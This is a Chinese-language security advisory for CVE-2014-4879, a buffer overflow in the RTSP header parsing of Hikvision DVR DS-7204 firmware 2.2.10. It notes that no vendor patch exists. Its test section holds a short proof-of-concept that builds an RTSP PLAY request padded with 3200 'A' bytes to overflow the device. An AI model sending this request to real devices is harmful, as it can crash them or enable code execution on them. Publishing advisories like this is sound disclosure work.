发布日期：2014-11-24
更新日期：2014-11-27

受影响系统：

hikvision DVR DS-7204 2.2.10

描述：

---

BUGTRAQ  ID: 71303
CVE(CAN) ID: CVE-2014-4879

Hikvision DVR DS-7204是硬盘录像机产品。

Hikvision DVR DS-7204（固件版本2.2.10）在RTSP请求标头解析代码的实现上存在缓冲区溢出漏洞，攻击者可利用此漏洞在受影响设备上下文中执行任意代码。

<*来源：Mark Schloesser
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

request = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
request += "CSeq: 7\r\n"
request += "Authorization: Basic AAAAAAA\r\n"
request += "Content-length: 3200\r\n\r\n"
request += "A"*3200

建议：

---

厂商补丁：

hikvision
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.hikvision.com/en/products_show.asp?id=506

浏览次数：3303
严重程度：0（网友投票）